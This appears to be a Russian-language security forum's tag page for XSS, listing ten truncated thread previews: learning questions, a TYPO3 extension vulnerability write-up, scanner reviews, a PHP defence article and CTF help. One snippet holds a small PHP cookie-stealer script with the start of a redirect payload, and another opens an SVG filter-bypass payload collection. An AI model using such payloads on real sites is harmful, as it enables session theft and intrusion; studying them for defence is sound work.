xss

  1. p0stman

    Для начального и глубокого освоения XSS атак с чего начать?

    Бодрый вечер, очень интересует тема xss уязвимостей, насколько я понял, для этого в изучении нужен в основном javascript или что то еще? Погуглив понял, что в основном все JS туторы созданы для фронт-енд(тот же UDEMY полон туторов для веба), может быть есть какая то особая прикладная область...
  2. Lisenok

    Статья Typo3. xss уязвимость расширения.

    Доброго времени суток господа и дамы. Сегодня опишу уязвимость найденную в расширение tt_news для typo3. Мы имеем typo3 версии 6.2.30 , расширение tt_news версии 3.6.0 (выделено красным). Так вот при создании новости на сайте, можно внедрить свой ява-скрипт код. Он отрабатывается и в поле...
  3. Tayrus

    Проблема Проблема с XSS

    Нашел на одном сайте XSS, решил сделать куки стилер создал файл stealer.php в него закинул такой код <?php $cookie = $_GET['cookie']; $log = fopen("xssed.txt","a"); fwrite($log, $cookie ."\n"); fclose($log); ?> Вставляю в уязвимый параметр: <ScRiPt>window.location =...
  4. K

    HACKER101

    Статья для участия в конкурсена codeby Многие видели hackerone выложили курс по безопасности веба с видеоуроками как по мне уроки для совсем начинающих но к ним есть практические задания которые оказались очень даже интересными и тут я опишу некоторые решения которые получились у меня. level...
  5. Sniff

    XsSCan - Web Application XSS Scanner

    XsSCan - это инструмент python для поиска уязвимостей Cross Site Scripting на веб-сайтах. Этот инструмент является лучшим в своем роде. Вместо того, чтобы просто проверять одну страницу, как это делают большинство инструментов, этот инструмент просматривает весь веб-сайт и сначала находит все...
  6. r0hack

    Статья [1] - Безопасный PHP. Защита от XSS атак.

    Всем Салам. Сегодня уже 2 часть из цикла статей безопасный PHP. И эта статья обещает быть информативной, особенно для новичков. И чтобы было представление о XSS, я разделю статью на 2 части, где в 1ом разберем, что за зверь этот XSS. А во втором рассмотрим, как она эксплуатируется в PHP и как...
  7. I

    Одно из заданий по CTF

    Столкнулся с этим заданием на местном ctf, но, к сожалению, не смог его до конца раскрутить.. На web сервере имеется сайт. На сайте есть форма для ввода пароля и загрузки файла. Файл загружается на сервер, только в случае правильного ввода пароля.. изначально пытался перебрать пароли по...
  8. SooLFaa

    XSS Tricks

    Решил некоторые байпассы XSS фильтров собрать. И предлагаю дополнять эту тему. Payload #1: <svg xml:base="data:image/svg+xml;base64, PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cD ovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhs aW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW...
  9. Vertigo

    XSStrike-Fuzz and Bruteforce Parameters for XSS

    Приветствую Уважаемых Друзей,Форумчан и Дорогих гостей нашего форума. Сегодня обзор будет о инструменте-сканере xsstrike от замечательного автора UltimateHackers Сомневался по-поводу целесообразности обзора. Но т.к.сведения о сканере начали активно распространяться,решился. В задачи...
  10. Dosia

    XSS уязвимость ( WordPress )

    Здравствуйте! При сканировании сайта на WordPress, была выявлена версия 3.4.2, так-же две уязвимости XSS: WordPress Plupload Unspecified XSS, Cross-Site scripting XSS. Как использовать эти уязвимости для атаки на тестируемый ресурс? ( Проникновение, переправка URL, загрузка shell и тд. )